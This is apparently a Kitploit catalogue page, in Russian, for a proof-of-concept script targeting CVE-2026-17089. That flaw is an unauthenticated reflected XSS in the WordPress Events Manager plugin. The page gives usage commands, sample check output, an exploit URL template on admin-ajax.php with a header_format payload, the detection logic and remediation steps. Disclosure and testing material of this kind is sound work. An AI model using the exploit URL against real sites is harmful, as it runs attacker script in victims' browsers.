Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-17089-PoC-pwnVader — Shell PoC для CVE-2026-17089 — неаутентифицированного отражённого XSS в плагине WordPress Events Manager (<= 7.4.0.1); выполняет фингерпринтинг плагина и проверяет отражение header_format. | Kitploit
Инструменты/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
Сканеры уязвимостейСканеры веб-уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubpwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

Shell PoC для CVE-2026-17089 — неаутентифицированного отражённого XSS в плагине WordPress Events Manager (<= 7.4.0.1); выполняет фингерпринтинг плагина и проверяет отражение header_format.

Репозиторий
10 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-17089 — Events Manager <= 7.4.0.1 — Отражённый XSS без аутентификации (header_format)

Автор: pwnVader · Лицензия: MIT (корень репозитория)

КомпонентEvents Manager – Calendar, Bookings, Tickets, and more! (плагин WordPress)
ТипCWE-79 — Отражённый межсайтовый скриптинг
Затронуто<= 7.4.0.1
Исправленов более позднем релизе 7.4.x (wp_kses_post() применён в EM_Events::output_grouped())
CVECVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

Краткое описание

Точка входа через шорткод очищает header_format с помощью wp_kses(), но не требующее аутентификации AJAX-действие search_events_grouped обходит эту очистку и выводит значение в HTML-ответ (EM_Events::output_grouped()). Удалённый неаутентифицированный атакующий может создать URL, который выполнит произвольный JavaScript в origin уязвимого сайта для любого пользователя, открывшего его (UI:R).

Использование

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

Пример вывода (check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

URL эксплойта

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

Логика обнаружения

  1. Фингерпринтинг: readme.txt (Stable tag) и/или путь к ресурсам плагина /wp-content/plugins/events-manager/includes/js/events-manager.js.
  2. Отправьте безобидный маркер (``) на admin-ajax.php?action=search_events_grouped с header_format, установленным в маркер, и проверьте, отражается ли необработанная разметка без экранирования в теле ответа.

Устранение

  • Обновите Events Manager до текущего релиза (исправление применяет wp_kses_post() к header_format внутри функции рендеринга, охватывая всех вызывающих).
  • Временная мера: заблокируйте неаутентифицированное AJAX-действие search_events_grouped или отфильтруйте header_format на уровне WAF/приложения.

Ссылки

  • NVD — CVE-2026-17089: https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory: https://github.com/advisories/GHSA-gg76-jx66-hjq8

Отказ от ответственности

Только для авторизованного тестирования безопасности. PoC работает в режиме только для чтения (check) или выводит URL (url); данные не изменяются.

Скачать инструмент